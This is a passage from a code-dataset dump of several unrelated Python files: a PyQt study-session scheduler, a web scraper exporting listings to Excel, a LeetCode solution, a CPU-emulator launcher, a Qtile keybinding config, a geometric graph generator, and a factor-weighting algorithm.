\n\n        with open(memory, 'r') as jsonmem:\n            # Get all this week's events using iso date handling\n            sessions = [item for item in load(jsonmem) if item['type'].lower() == 'session']\n            thisweek = [item for item in sessions if\n                        date_today <= datefromiso(item['start_time']) <= datefromiso(weeklater)]\n            thisweek = sorted(thisweek, key=lambda k: k['start_time'])\n\n            for item in thisweek:\n                self.eventcheckbox = QtWidgets.QCheckBox(self.gridlayout)\n                self.eventcheckbox.setText(item['description'])\n                for key, value in subjectgroups.items():  # Colour codes the session appropriately.\n                    if item['subject'] in value:\n                        self.eventcheckbox.setStyleSheet(\"background-color:\" + colour_dict[key] + ';  \\n')\n                        break\n                self.gridLayout.addWidget(self.eventcheckbox, boxnumber, 0, 1, 1)\n                boxnumber += 1\n\n    def createform(self):\n        self.window = QtWidgets.QMainWindow()\n        self.dialog = FormWindow(self.window)\n        self.window.show()\n\n    def createsessionform(self):\n        self.window = QtWidgets.QMainWindow()\n        self.dialog = Sessionform(self.window)\n        self.window.show()\n\n    def showcalendar(self):\n        self.window = QtWidgets.QDialog()\n        self.window.setStyleSheet(\"background-color:black\")\n        self.dialog = Calendar(self.window)\n        self.window.show()\n\n    def setdarktheme(self):\n        stylesheet = '''\n        border-width: 2px;\n        border-radius: 4px;\n        padding: 2px;\n        border-style: outset;\n        border-color:#00FFFF\n        '''\n\n        with open('dark.qss', 'r') as theme:\n            self.MainWindow.setStyleSheet(theme.read())\n        self.todaybutton.setStyleSheet(stylesheet)\n        self.weekbutton.setStyleSheet(stylesheet)\n        self.eventlist.setStyleSheet(stylesheet)\n        self.calendarbutton.setStyleSheet(stylesheet)\n        self.newexambutton.setStyleSheet(stylesheet)\n        self.newsessionbutton.setStyleSheet(stylesheet)\n        self.label_4.setStyleSheet(\"color:cyan;\")\n        self.darktheme = True\n        self.label_4.setText(\"Today\")
\n\n    def setlighttheme(self):\n        stylesheet = '''border-style: outset;\\n\n        border-width: 2px;\\n\n        border-radius: 4px;\\n\n        border-color: blue\\n\n\n        '''\n        orangestylesheet = '''border-style: outset;\\n\n        border-width: 2px;\\n\n        border-radius: 4px;\\n\n        border-color: darkorange\\n\n        '''\n\n        with open('light.qss', 'r') as theme:\n            self.MainWindow.setStyleSheet(theme.read())\n        self.todaybutton.setStyleSheet(stylesheet)\n        self.label_4.setStyleSheet(\"color:blue;\")\n        self.weekbutton.setStyleSheet(stylesheet)\n        self.eventlist.setStyleSheet(stylesheet)\n        self.calendarbutton.setStyleSheet(stylesheet)\n        self.newexambutton.setStyleSheet(orangestylesheet)\n        self.newsessionbutton.setStyleSheet(orangestylesheet)\n        self.darktheme = False\n        self.label_4.setText(\"Today\")
\n\n    def changetheme(self):\n        with open('theme.json', mode='r') as memory:\n            s = load(memory)\n            if not s[\"darktheme\"]:\n                self.setdarktheme()\n                theme = '''{\"darktheme\":true}'''\n            else:\n                self.setlighttheme()\n                theme = '''{\"darktheme\":false}'''\n        with open('theme.json', mode='w') as memory:\n            memory.write(theme)\n\n    def schedule(self, event: dict, wordcount, chaptercount):\n        self.window.close()\n        deadline_date = datefromiso(event['deadline'])\n        days_available = daysBetween(datetime.date.fromisoformat(deadline_date))  # start time is iso string\n        time_required = wordcount / 250 + chaptercount * 1.5  # 90mins/chapter, and 250 words an hour.\n        daily_sessions = round(\n            time_required / days_available) if days_available > 0 else time_required  # time required is a plain number of hours\n        frontloaded_days_int = round(days_available / 2) if days_available > 1 else 1  # number of days\n\n        for i in range(1, frontloaded_days_int + 1):  # Everything within here repeats once a day\n\n            for session in range(5, round(min(2 * 2 * daily_sessions + 9, 18)),\n                                 2):\n                # Creates a new session 30 mins later, this block repeats within a single day TODO: Possibly refine using hours and minutes\n                self.write_session(datetime.time(hour=session), i, event)\n\n\n        for j in range(frontloaded_days_int, days_available):\n            for session in range(5, round(min(3 * daily_sessions + 9, 18)), 3):  # Caps the number of daily sessions\n                self.write_session(datetime.time(hour=session), j, event)\n\n    def write_session(self, time,\n                      displacement,\n                      memory_dict):  # Time refers to the starting time(not date) of the session. Displacement refers to the hours/time before the session\n\n        precomputed_end = (datetime.datetime.combine(datetime.date.min, time) + datetime.timedelta(minutes=90)).time().isoformat()\n        # Ninety minutes later, for duration of session (timedelta arithmetic avoids minute overflow)\n        session_summary = memory_dict['notes'] if memory_dict['notes'] \\\n            else \"Study Session \" + memory_dict['subject']\n        constructed_date = (datetime.datetime.now().date() + datetime.timedelta(days=displacement)).isoformat()\n        eventID = randomiser_for_ids()\n        # Constructs a date using time and displacement parameters\n\n        session = {\n            'event_id': eventID,\n            'name': '',\n            'subject': memory_dict['subject'],\n            'description': 'Work On ' + \"\\'\" + session_summary + \"\\'\",\n            'plan': '',\n            'type': 'session',\n            'start_time': constructed_date + 'T' + time.isoformat(),\n            'end_time': constructed_date + 'T' + precomputed_end,  # Adds 90 minutes\n            'deadline': None\n        }\n\n        cronosession = {\n            'event_id': eventID,\n            'summary': 'Work On ' + \"\\'\" + session_summary + \"\\'\",\n            'description': \"more whatnot\",\n            'start': constructed_date + 'T' + time.isoformat(),\n            'end': constructed_date + 'T' + precomputed_end,\n        }\n        writetoJSON(session)\n\n        notificationjob = scheduler.add_job(name='notification', func=notification,\n                                            args=[session['subject'], session['description']],\n                                            run_date=constructed_date+'T'+time.isoformat())\n\n\nclass Sessionform(QtWidgets.QMainWindow):\n    def __init__(self, MainWindow, parent=None):\n        super(QtWidgets.QMainWindow, self).__init__(parent)\n        MainWindow.setObjectName(\"New Session\")\n        MainWindow.resize(394, 472)\n        self.MainWindow = MainWindow\n        self.centralWidget = QtWidgets.QWidget(MainWindow)\n        self.centralWidget.setObjectName(\"centralWidget\")\n        self.formLayoutWidget = QtWidgets.QWidget(self.centralWidget)\n        self.formLayoutWidget.setGeometry(QtCore.QRect(0, 0, 391, 431))\n        self.formLayoutWidget.setObjectName(\"formLayoutWidget\")\n        self.formLayout = 
QtWidgets.QFormLayout(self.formLayoutWidget)\n self.formLayout.setContentsMargins(11, 11, 11, 11)\n self.formLayout.setSpacing(6)\n self.formLayout.setObjectName(\"formLayout\")\n self.label_2 = QtWidgets.QLabel(self.formLayoutWidget)\n self.label_2.setObjectName(\"label_2\")\n self.formLayout.setWidget(1, QtWidgets.QFormLayout.LabelRole, self.label_2)\n self.subject_box = QtWidgets.QComboBox(self.formLayoutWidget)\n self.subject_box.setObjectName(\"subject_box\")\n self.formLayout.setWidget(1, QtWidgets.QFormLayout.FieldRole, self.subject_box)\n self.horizontalLayout = QtWidgets.QHBoxLayout()\n self.horizontalLayout.setSpacing(6)\n self.horizontalLayout.setObjectName(\"horizontalLayout\")\n self.formLayout.setLayout(2, QtWidgets.QFormLayout.LabelRole, self.horizontalLayout)\n self.label_4 = QtWidgets.QLabel(self.formLayoutWidget)\n self.label_4.setObjectName(\"label_4\")\n self.formLayout.setWidget(3, QtWidgets.QFormLayout.LabelRole, self.label_4)\n self.dateTimeEdit = QtWidgets.QDateTimeEdit(self.formLayoutWidget)\n self.dateTimeEdit.setObjectName(\"dateTimeEdit\")\n self.formLayout.setWidget(3, QtWidgets.QFormLayout.FieldRole, self.dateTimeEdit)\n self.label_3 = QtWidgets.QLabel(self.formLayoutWidget)\n self.label_3.setObjectName(\"label_3\")\n self.formLayout.setWidget(4, QtWidgets.QFormLayout.LabelRole, self.label_3)\n self.label_5 = QtWidgets.QLabel(self.formLayoutWidget)\n self.label_5.setObjectName(\"label_5\")\n self.formLayout.setWidget(5, QtWidgets.QFormLayout.LabelRole, self.label_5)\n self.sessionplan = QtWidgets.QPlainTextEdit(self.formLayoutWidget)\n self.sessionplan.setObjectName(\"sessionplan\")\n self.formLayout.setWidget(5, QtWidgets.QFormLayout.FieldRole, self.sessionplan)\n self.horizontalLayout_4 = QtWidgets.QHBoxLayout()\n self.horizontalLayout_4.setSpacing(6)\n self.horizontalLayout_4.setObjectName(\"horizontalLayout_4\")\n spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\n self.horizontalLayout_4.addItem(spacerItem)\n self.pushButton = QtWidgets.QPushButton(self.formLayoutWidget)\n self.pushButton.setMaximumSize(QtCore.QSize(200, 16777215))\n self.pushButton.setObjectName(\"pushButton\")\n self.horizontalLayout_4.addWidget(self.pushButton)\n self.formLayout.setLayout(6, QtWidgets.QFormLayout.FieldRole, self.horizontalLayout_4)\n self.horizontalLayout_3 = QtWidgets.QHBoxLayout()\n self.horizontalLayout_3.setSpacing(6)\n self.horizontalLayout_3.setObjectName(\"horizontalLayout_3\")\n self.formLayout.setLayout(8, QtWidgets.QFormLayout.LabelRole, self.horizontalLayout_3)\n self.summary = QtWidgets.QPlainTextEdit(self.formLayoutWidget)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.summary.sizePolicy().hasHeightForWidth())\n self.summary.setSizePolicy(sizePolicy)\n self.summary.setMaximumSize(QtCore.QSize(250, 25))\n self.summary.setObjectName(\"summary\")\n self.formLayout.setWidget(4, QtWidgets.QFormLayout.FieldRole, self.summary)\n MainWindow.setCentralWidget(self.centralWidget)\n self.menuBar = QtWidgets.QMenuBar(MainWindow)\n self.menuBar.setGeometry(QtCore.QRect(0, 0, 394, 22))\n self.menuBar.setObjectName(\"menuBar\")\n MainWindow.setMenuBar(self.menuBar)\n self.mainToolBar = QtWidgets.QToolBar(MainWindow)\n self.mainToolBar.setObjectName(\"mainToolBar\")\n MainWindow.addToolBar(QtCore.Qt.TopToolBarArea, self.mainToolBar)\n self.statusBar = 
QtWidgets.QStatusBar(MainWindow)\n        self.statusBar.setObjectName(\"statusBar\")\n        MainWindow.setStatusBar(self.statusBar)\n        for i in range(0, len(listofsubjects)): self.subject_box.addItem(listofsubjects[i])\n\n        self.retranslateUi(MainWindow)\n        self.pushButton.clicked.connect(lambda: self.save_event())\n        QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n    def retranslateUi(self, MainWindow):\n        _translate = QtCore.QCoreApplication.translate\n        MainWindow.setWindowTitle(_translate(\"New Session\", \"New Session\"))\n        self.label_2.setText(_translate(\"MainWindow\", \"Subject\"))\n        self.label_4.setText(_translate(\"MainWindow\", \"Date\"))\n        self.label_3.setText(_translate(\"MainWindow\", \"Event\"))\n        self.label_5.setText(_translate(\"MainWindow\", \"Plan/Notes\"))\n        self.pushButton.setText(_translate(\"MainWindow\", \"Save Event\"))\n        self.dateTimeEdit.setDate(QtCore.QDate.currentDate())\n\n    def save_event(self):\n        iso_date = self.dateTimeEdit.dateTime().toPyDateTime()\n        iso_date_utc = iso_date.astimezone(pytz.utc).isoformat()\n        plusninety_utc = (datetime.datetime.fromisoformat(iso_date_utc) + datetime.timedelta(minutes=90)).astimezone(\n            pytz.utc).isoformat()\n\n        eventID = randomiser_for_ids()\n        memory_dict = {\n            'event_id': eventID,\n            'type': \"Session\",\n            'name': self.summary.toPlainText(),\n            'subject': self.subject_box.currentText(),\n            'start_time': iso_date_utc,\n            'end_time': plusninety_utc,\n            'deadline': iso_date_utc,\n            'plan': self.sessionplan.toPlainText(),\n            'description': self.sessionplan.toPlainText()\n        }\n\n        cronofy_dict = {\n            'event_id': eventID,\n            'summary': memory_dict['name'],\n            'description': self.sessionplan.toPlainText(),\n            'start': iso_date_utc,\n            'end': plusninety_utc,\n            # 90 minutes later\n        }\n        writetoJSON(memory_dict)\n        notificationjob = scheduler.add_job(name='notification', func=notification,\n                                            args=[memory_dict['subject'], memory_dict['description']],\n                                            run_date=iso_date_utc)\n        self.close()\n\n\nclass FormWindow(QtWidgets.QMainWindow):\n\n    def __init__(self, MainWindow, parent=None):\n        super(QtWidgets.QMainWindow, self).__init__(parent)\n        MainWindow.setObjectName(\"New Exam\")\n        MainWindow.resize(355, 437)\n        self.MainWindow = MainWindow\n        self.centralWidget = QtWidgets.QWidget(MainWindow)\n        self.centralWidget.setObjectName(\"centralWidget\")\n        self.formLayoutWidget = QtWidgets.QWidget(self.centralWidget)\n        self.formLayoutWidget.setGeometry(QtCore.QRect(10, 10, 341, 361))\n        self.formLayoutWidget.setObjectName(\"formLayoutWidget\")\n        self.formLayout = QtWidgets.QFormLayout(self.formLayoutWidget)\n        self.formLayout.setContentsMargins(11, 11, 11, 11)\n        self.formLayout.setSpacing(6)\n        self.formLayout.setObjectName(\"formLayout\")\n        self.label = QtWidgets.QLabel(self.formLayoutWidget)\n        self.label.setObjectName(\"label\")\n        self.formLayout.setWidget(1, QtWidgets.QFormLayout.LabelRole, self.label)\n        self.event_type_box = QtWidgets.QComboBox(self.formLayoutWidget)\n        self.event_type_box.setObjectName(\"event_type_box\")\n        self.event_type_box.addItem(\"\")\n        self.event_type_box.addItem(\"\")\n        self.event_type_box.addItem(\"\")\n        self.event_type_box.addItem(\"\")\n        self.formLayout.setWidget(1, QtWidgets.QFormLayout.FieldRole, self.event_type_box)\n        self.label_2 = QtWidgets.QLabel(self.formLayoutWidget)\n        self.label_2.setObjectName(\"label_2\")\n        self.formLayout.setWidget(2, QtWidgets.QFormLayout.LabelRole, self.label_2)\n        self.subject_box = QtWidgets.QComboBox(self.formLayoutWidget)\n        self.subject_box.setObjectName(\"subject_box\")\n        for i in range(0, len(listofsubjects)
): self.subject_box.addItem(listofsubjects[i])\n        self.formLayout.setWidget(2, QtWidgets.QFormLayout.FieldRole, self.subject_box)\n        self.horizontalLayout = QtWidgets.QHBoxLayout()\n        self.horizontalLayout.setSpacing(6)\n        self.horizontalLayout.setObjectName(\"horizontalLayout\")\n        self.formLayout.setLayout(3, QtWidgets.QFormLayout.LabelRole, self.horizontalLayout)\n        self.label_3 = QtWidgets.QLabel(self.formLayoutWidget)\n        self.label_3.setObjectName(\"label_3\")\n        self.formLayout.setWidget(7, QtWidgets.QFormLayout.LabelRole, self.label_3)\n        self.label_4 = QtWidgets.QLabel(self.formLayoutWidget)\n        self.label_4.setObjectName(\"label_4\")\n        self.formLayout.setWidget(4, QtWidgets.QFormLayout.LabelRole, self.label_4)\n        self.dateTimeEdit = QtWidgets.QDateTimeEdit(self.formLayoutWidget)\n        self.dateTimeEdit.setObjectName(\"dateTimeEdit\")\n        self.dateTimeEdit.setMinimumSize(QtCore.QSize(100, 20))\n        self.formLayout.setWidget(4, QtWidgets.QFormLayout.FieldRole, self.dateTimeEdit)\n        self.label_5 = QtWidgets.QLabel(self.formLayoutWidget)\n        self.label_5.setObjectName(\"label_5\")\n        self.formLayout.setWidget(8, QtWidgets.QFormLayout.LabelRole, self.label_5)\n        self.summary = QtWidgets.QPlainTextEdit(self.formLayoutWidget)\n        self.summary.setMaximumSize(QtCore.QSize(200, 100))\n        self.summary.setObjectName(\"summary\")\n        self.formLayout.setWidget(7, QtWidgets.QFormLayout.FieldRole, self.summary)\n        self.plan = QtWidgets.QPlainTextEdit(self.formLayoutWidget)\n        self.plan.setMaximumSize(QtCore.QSize(200, 100))\n        self.plan.setObjectName(\"plan\")\n        self.formLayout.setWidget(8, QtWidgets.QFormLayout.FieldRole, self.plan)\n        self.label_6 = QtWidgets.QLabel(self.formLayoutWidget)\n        self.label_6.setObjectName(\"label_6\")\n        self.formLayout.setWidget(5, QtWidgets.QFormLayout.LabelRole, self.label_6)\n        self.label_7 = QtWidgets.QLabel(self.formLayoutWidget)\n        self.label_7.setObjectName(\"label_7\")\n        self.formLayout.setWidget(6, QtWidgets.QFormLayout.LabelRole, self.label_7)\n        self.word_count = QtWidgets.QSpinBox(self.formLayoutWidget)\n        self.word_count.setMaximum(90000)\n        self.word_count.setSingleStep(200)\n        self.word_count.setProperty(\"value\", 0)\n        self.word_count.setObjectName(\"word_count\")\n        self.formLayout.setWidget(5, QtWidgets.QFormLayout.FieldRole, self.word_count)\n        self.chapter_count = QtWidgets.QSpinBox(self.formLayoutWidget)\n        self.chapter_count.setObjectName(\"chapter_count\")\n        self.formLayout.setWidget(6, QtWidgets.QFormLayout.FieldRole, self.chapter_count)\n        self.horizontalLayout_3 = QtWidgets.QHBoxLayout()\n        self.horizontalLayout_3.setSpacing(6)\n        self.horizontalLayout_3.setObjectName(\"horizontalLayout_3\")\n        self.formLayout.setLayout(11, QtWidgets.QFormLayout.LabelRole, self.horizontalLayout_3)\n        self.horizontalLayout_4 = QtWidgets.QHBoxLayout()\n        self.horizontalLayout_4.setSpacing(6)\n        self.horizontalLayout_4.setObjectName(\"horizontalLayout_4\")\n        spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\n        self.horizontalLayout_4.addItem(spacerItem)\n        self.save_button = QtWidgets.QPushButton(self.formLayoutWidget)\n        self.save_button.setMaximumSize(QtCore.QSize(200, 16777215))\n        self.save_button.setObjectName(\"pushButton\")\n        self.horizontalLayout_4.addWidget(self.save_button)\n        self.formLayout.setLayout(9, QtWidgets.QFormLayout.FieldRole, self.horizontalLayout_4)\n        MainWindow.setCentralWidget(self.centralWidget)\n        self.menuBar = QtWidgets.QMenuBar(MainWindow)\n        self.menuBar.setGeometry(QtCore.QRect(0, 0, 355, 22))\n        
self.menuBar.setObjectName(\"menuBar\")\n MainWindow.setMenuBar(self.menuBar)\n self.mainToolBar = QtWidgets.QToolBar(MainWindow)\n self.mainToolBar.setObjectName(\"mainToolBar\")\n MainWindow.addToolBar(QtCore.Qt.TopToolBarArea, self.mainToolBar)\n self.statusBar = QtWidgets.QStatusBar(MainWindow)\n self.statusBar.setObjectName(\"statusBar\")\n MainWindow.setStatusBar(self.statusBar)\n self.retranslateUi(MainWindow)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n self.save_button.clicked.connect(self.save_event)\n\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"New Exam\", \"New Exam\"))\n self.label.setText(_translate(\"MainWindow\", \"Event type\"))\n self.dateTimeEdit.setDate(QtCore.QDate.currentDate())\n self.event_type_box.setItemText(0, _translate(\"MainWindow\", \"Exam\"))\n self.event_type_box.setItemText(1, _translate(\"MainWindow\", \"Project\"))\n self.event_type_box.setItemText(2, _translate(\"MainWindow\", \"Deadline\"))\n self.event_type_box.setItemText(3, _translate(\"MainWindow\", \"Other\"))\n self.label_2.setText(_translate(\"MainWindow\", \"Subject\"))\n self.label_3.setText(_translate(\"MainWindow\", \"Summary/Notes\"))\n self.label_4.setText(_translate(\"MainWindow\", \"Deadline\"))\n self.label_5.setText(_translate(\"MainWindow\", \"Plan\"))\n self.label_6.setText(_translate(\"MainWindow\", \"Word count\"))\n self.label_7.setText(_translate(\"MainWindow\", \"Chapter count\"))\n self.save_button.setText(_translate(\"MainWindow\", \"Save Event\"))\n\n def save_event(self):\n iso_date = self.dateTimeEdit.dateTime().toPyDateTime()\n iso_date_utc = iso_date.astimezone(pytz.utc).isoformat()\n\n eventID = randomiser_for_ids()\n memory_dict = {\n 'event_id': eventID,\n 'type': self.event_type_box.currentText(),\n 'subject': self.subject_box.currentText(),\n 'deadline': iso_date_utc,\n 'wordcount': self.word_count.value(),\n 'chaptercount': self.chapter_count.value(),\n 'notes': self.summary.toPlainText(),\n 'summary': self.plan.toPlainText(),\n 'name': self.summary.toPlainText(),\n 'description': self.summary.toPlainText()\n # Delivers a GST date/time\n }\n cronofy_dict = {\n 'event_id': eventID,\n 'summary': memory_dict['notes'],\n 'description': \"An important deadline\",\n 'start': iso_date_utc,\n 'end':(datetime.datetime.fromisoformat(iso_date_utc) + datetime.timedelta(hours=2)).isoformat()\n # 2 hours later, uses UTC\n }\n\n writetoJSON(memory_dict)\n notificationjob = scheduler.add_job(name='notification', func=notification,\n args=[memory_dict['subject'], memory_dict['description']],\n run_date=iso_date_utc)\n Ui_MainWindow.schedule(ui, memory_dict, self.word_count.value(), self.chapter_count.value())\n\n self.close()\n\n\nclass Calendar(QtWidgets.QCalendarWidget):\n def __init__(self, parent=None):\n QtWidgets.QCalendarWidget.__init__(self, parent)\n self.setMinimumSize(QtCore.QSize(500, 500))\n self.setMaximumSize(QtCore.QSize(5000, 5000))\n self.setSelectionMode(True)\n self.currentPageChanged.connect(lambda: self.updateCells())\n self.setStyleSheet(\"background-color:white;\\n color:black\")\n\n def paintCell(self, painter, rect, date):\n QtWidgets.QCalendarWidget.paintCell(self, painter, rect, date)\n with open('memory.json', mode='r') as memory:\n exams = [i for i in load(memory) if i['type'].lower() in ['deadline', 'exam', 'project', 'other']]\n x = date.toPyDate().isoformat() # ISO format of a calendar date(this should run on every cell of the calendar)\n for exam in 
exams:\n                if x == datefromiso(exam['deadline']):\n                    # Finds the required colour based on the dictionary\n                    for(key, value) in subjectgroups.items():\n                        if exam['subject'] in value:\n                            painter.setBrush(QtGui.QColor(colour_dict[key]))\n                            painter.drawRect(rect)\n                            painter.setBrush(QtGui.QColor('#ffffff'))\n                            painter.drawText(rect.center(), str(date.day()))\n                            painter.drawText(rect.bottomLeft(), exam['subject'])\n                            break\n\n    def screenshot(self):\n        QtGui.QGuiApplication.primaryScreen().grabWindow(0).save(datetime.datetime.now().isoformat(), 'jpg')\n\n\nif __name__ == \"__main__\":\n    import sys\n\n    app = QtWidgets.QApplication(sys.argv)\n    MainWindow = QtWidgets.QMainWindow()\n    ui = Ui_MainWindow(MainWindow)\n    MainWindow.show()\n    sys.exit(app.exec_())\n","sub_path":"Executable Source Code.py","file_name":"Executable Source Code.py","file_ext":"py","file_size_in_byte":40890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"451593421","text":"import xlsxwriter\nimport urllib.request\nfrom bs4 import BeautifulSoup\n\n\ndef isNumber(s):\n    try:\n        float(s)\n        return True\n    except ValueError:\n        return False\n\n\nworkbook = xlsxwriter.Workbook('D:\\\\Study\\\\University\\\\excel_fix_output\\\\output.xlsx')\nworksheet = workbook.add_worksheet()\n\nworksheet.write(0, 0, 'name')\nworksheet.write(0, 1, 'Team name')\nworksheet.write(0, 2, 'repository')\nworksheet.write(0, 3, 'year')\n\n\ncount = 1\nhtml_number = 0\n\n\nfor i in range(198):\n    response = urllib.request.urlopen(\n        \"http://openknowledge.kotra.or.kr/browse?type=dateissued&null=&sort_by=2&order=ASC&rpp=20&etal=-1&null=&offset=\" + str(html_number))\n    html_source = response.read()\n    soup = BeautifulSoup(html_source, \"html.parser\")\n    con = soup.find(\"div\", {\"class\": \"con\"})\n    dl = con.find_all(\"dl\")\n    html_number = html_number + 20\n\n    for j in dl:\n        dd = j.find_all(\"dd\")\n        worksheet.write(count, 0, j.find(\"dt\").get_text())\n        worksheet.write(count, 1, dd[0].get_text())\n        strr = str(dd[1].get_text()).replace(\"-\", \"\", 2)\n\n        if (isNumber(strr)):\n            worksheet.write(count, 3, dd[1].get_text())\n        else:\n            worksheet.write(count, 2, dd[1].get_text())\n            worksheet.write(count, 3, dd[2].get_text())\n        count = count + 1\n\nworkbook.close()\n","sub_path":"python_module/pycharm/Crawling/kotra_crawling.py","file_name":"kotra_crawling.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"511061890","text":"#\n# @lc app=leetcode.cn id=205 lang=python\n#\n# [205] Isomorphic Strings\n#\n\n# @lc code=start\nclass Solution(object):\n    def isIsomorphic(self, s, t):\n        \"\"\"\n        :type s: str\n        :type t: str\n        :rtype: bool\n        \"\"\"\n        map = {}\n        lens = len(s)\n        for i in range(lens):\n            if s[i] not in map:\n                if t[i] in map.values():\n                    return False\n                map[s[i]] = t[i]\n            else:\n                if map[s[i]] != t[i]:\n                    return False\n        return True\n# @lc code=end\n\n","sub_path":"Week_09/205.同构字符串.py","file_name":"205.同构字符串.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"309893468","text":"#!/usr/bin/env python3\n\n\"\"\"Main.\"\"\"\n\nimport sys\nfrom cpu import *\n\nif len(sys.argv) == 2:\n\n    program = sys.argv[1]\n\nelse:\n\n    program = None\n    print('-----------------------------------')\n    print('A default program will be executed.')\n    print('-----------------------------------')\n\ncpu = 
CPU()\n\ncpu.load(program)\ncpu.run()","sub_path":"ls8/ls8.py","file_name":"ls8.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"231311428","text":"from libqtile.command import lazy\nfrom libqtile.config import Key\n\n\nkeys = [\n    # existing bindings omitted\n    # toggle mute\n    Key([], 'XF86AudioMute', lazy.spawn('pactl set-sink-mute 0 toggle')),\n    # raise and lower the volume\n    Key([], 'XF86AudioLowerVolume', lazy.spawn('pactl set-sink-volume 0 -5%')),\n    Key([], 'XF86AudioRaiseVolume', lazy.spawn('pactl set-sink-volume 0 +5%')),\n    # raise and lower the screen brightness\n    Key([], 'XF86MonBrightnessUp', lazy.spawn('light -A 5')),\n    Key([], 'XF86MonBrightnessDown', lazy.spawn('light -U 5')),\n]\n","sub_path":"pages/blog/2019/qtile-keybindings/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"149865612","text":"import random\nimport imageio\nimport pandas as pd\nimport networkx as nx\nimport matplotlib.pyplot as plt\n\nclass HullCoverConditionedUnitDiskGraphGenerator(object):\n    \"\"\"\n    Unit disk graph generation conditioned on image pixels.\n    \"\"\"\n    def __init__(self, args):\n        \"\"\"\n        Setting up the graph generator.\n        :param args: Arguments object.\n        \"\"\"\n        self.args = args\n        self.image = imageio.imread(self.args.input_path)\n        self.points = {i: (random.uniform(0, 1), random.uniform(0, 1)) for i in range(self.args.point_number)}\n    \n    def keep_point(self, point):\n        \"\"\"\n        Checking whether a point is covered in the image.\n        \"\"\"\n        y = int((1-point[1])*self.image.shape[0])\n        x = int(point[0]*self.image.shape[1])\n        if self.image[y,x,0] == 0:\n            keep = True\n        else:\n            keep = False\n        return keep\n\n    def create_graph(self):\n        \"\"\"\n        Creating a graph by first dropping the points.\n        \"\"\"\n        self.points = {node: point for node, point in self.points.items() if self.keep_point(point)}\n        self.remaining_nodes = list(self.points.keys())\n        self.reindexed_nodes = {node:index for index, node in enumerate(self.remaining_nodes)}\n        self.points = {self.reindexed_nodes[k]:v for k, v in self.points.items()}\n        self.graph = nx.random_geometric_graph(len(self.points.keys()), self.args.radius, pos=self.points)\n\n    def plot_graph(self):\n        \"\"\"\n        Plotting the graph and saving the plot.\n        \"\"\"\n        nx.draw(self.graph,\n                self.points,\n                with_labels=False,\n                linewidths=self.args.line_width,\n                alpha=self.args.alpha,\n                node_size=self.args.node_size,\n                width=self.args.line_width,\n                edge_color=\"gray\",\n                node_color=self.args.node_color)\n        plt.savefig(self.args.output_image, format=\"PNG\", dpi=self.args.dpi)\n        plt.close()\n\n    def save_graph(self):\n        \"\"\"\n        Saving the graph in an edge list format.\n        \"\"\"\n        pd.DataFrame(self.graph.edges(),columns = [\"node_1\",\"node_2\"], index = None).to_csv(self.args.output_edges)\n","sub_path":"src/hull_cover_graph.py","file_name":"hull_cover_graph.py","file_ext":"py","file_size_in_byte":2213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"306428581","text":"import pandas as pd\nfrom os.path import abspath, join, dirname, exists\nimport os\nimport numpy as np\nimport random\nfrom itertools import combinations\n\nparent_dir_writer = abspath('result/statistic/weight')\n\nclass FaAwu(object):\n    def __init__(self, n_factor, n_choose=1):\n        self.n_factor = n_factor\n        self.n_choose = n_choose\n        self.name = 'AWU' # Additive Weight Update\n        self.weights = []\n        
self.variant = 0\n if self.variant in [0, 1]:\n self.mask = list(combinations(range(self.n_factor), n_choose))\n self.n_comb = len(self.mask)\n elif self.variant == 2:\n self.n_comb = self.n_factor\n # method parameter\n self.eta = 1\n self.gamma = 0.01 # EE rate\n # method update parameter\n self.__w = [1] * self.n_comb\n\n def compute_weight(self, abs_ic):\n \"\"\"\n Input: abs_ic: float-array (n_time, n_factor)\n \"\"\"\n for t in range(len(abs_ic)):\n per_ic = abs_ic[t]\n weight = self.weight_update(t, per_ic)\n self.weights.append(weight)\n\n def weight_update(self, t, per_ic):\n \"\"\"\n Input: per_ic: periodic absolute ic - float-array (n_factor)\n \"\"\"\n # choose\n if self.variant == 0:\n chosen_idx = self.__draw(self.__w)\n elif self.variant == 1:\n p = [(1 - self.gamma) * w / sum(self.__w) + self.gamma / self.n_comb for w in self.__w]\n chosen_idx = self.__draw(p)\n elif self.variant == 2:\n chosen_idx = self.__top(self.__w)\n\n # update\n for i in range(self.n_comb):\n if self.variant in [0, 1]:\n reward = 0\n for j in range(self.n_choose):\n reward += per_ic[self.mask[i][j]]\n self.__w[i] += self.eta * reward\n elif self.variant == 2:\n self.__w[i] += self.eta * per_ic[i]\n\n weight = [0] * self.n_factor\n for j in range(self.n_choose):\n if self.variant in [0, 1]:\n weight[self.mask[chosen_idx][j]] = 1\n elif self.variant == 2:\n weight[chosen_idx[j]] = 1\n return weight\n\n def __draw(self, weights):\n \"\"\"\n Function: draw from uniform distribution\n Input: weights: float-list (n_stock)\n Output: index: chosen index\n \"\"\"\n choice = random.uniform(0, sum(weights))\n index = 0\n for weight in weights:\n choice -= weight\n if choice <= 0:\n return index\n index += 1\n return len(weights) - 1\n\n def __top(self, weights):\n \"\"\"\n Function: select top n_choose weight\n Input: weights: float-list (n_stock)\n Output: index: int-list (n_choose)\n \"\"\"\n choice = np.argsort(weights)[::-1]\n index = []\n for i in range(self.n_choose):\n index.append(choice[i])\n 